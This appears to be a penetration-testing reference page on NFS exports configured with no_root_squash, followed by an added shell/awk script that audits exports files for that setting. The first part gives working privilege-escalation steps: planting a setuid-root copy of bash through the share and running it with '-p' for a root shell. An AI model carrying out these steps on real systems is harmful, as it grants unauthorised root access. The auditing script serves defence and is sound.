NFS no_root_squash
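Overview

If an NFS export is configured with the `no_root_squash` option, the server does not map a client's root user (UID 0) to the anonymous user. An attacker can therefore mount that export on their own machine and modify any file on it while acting as root.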
Steps
- Mount the share on the attacker machine.
- Inside the victim machine, copy `/bin/bash` into the export:

  ```bash
  # e.g. /home/james is an NFS export
  cd /home/james
  cp /bin/bash .
  ```

- From the attacker machine:

  ```bash
  cd /mnt
  sudo chown root:root bash
  sudo chmod u+s bash
  ```

- Back on the victim machine:

  ```bash
  ./bash -p
  # enjoy!
  ```
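
To find exports open to the steps above, this added example (not part of the original page) parses exports(5)-format text and lists every export/client pair where root squashing is disabled, including default options given as `-opt,...` and lines continued with a backslash. The function names and the sample hosts and paths (other than `/home/james`) are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original page): report NFS exports where root
# squashing is disabled. Reads exports(5)-format text from the files given as
# arguments, or from stdin. Assumes export paths contain no whitespace.
audit_exports() {
    awk '
    {
        sub(/#.*/, "")                          # drop comments
        while (sub(/\\[ \t]*$/, "")) {          # join backslash-continued lines
            if ((getline nxt) <= 0) break
            sub(/#.*/, "", nxt)
            $0 = $0 " " nxt
        }
        if (NF < 1) next
        defaults = ""
        for (i = 2; i <= NF; i++) {
            if ($i ~ /^-/) { defaults = substr($i, 2); continue }  # "-opt,..." = defaults
            client = $i; opts = ""
            if (match($i, /\(.*\)$/)) {         # split "client(opt,opt)"
                client = substr($i, 1, RSTART - 1)
                opts = substr($i, RSTART + 1, RLENGTH - 2)
            }
            if (client == "") client = "*"      # bare "(opts)" applies to any host
            squash = 1                          # root_squash is the default
            n = split(defaults "," opts, o, ",")
            for (j = 1; j <= n; j++) {          # later options override earlier ones
                if (o[j] == "no_root_squash") squash = 0
                else if (o[j] == "root_squash") squash = 1
            }
            if (!squash) printf "%s\t%s\n", $1, client
        }
    }' "$@"
}

# Constructed sample input; hosts and paths other than /home/james are made up.
sample_exports() {
    cat <<'EOF'
# constructed sample
/srv/public   *(ro,root_squash)
/home/james   192.0.2.10(rw,sync,no_root_squash)
/srv/build    -rw,no_root_squash ci1.example.test ci2.example.test(root_squash)
/srv/backup   198.51.100.0/24(rw) \
              (rw,no_root_squash)
EOF
}

sample_exports | audit_exports
```

On an NFS server, run `audit_exports /etc/exports`; each export/client pair it prints should be returned to the default `root_squash` unless root access from that client is genuinely required.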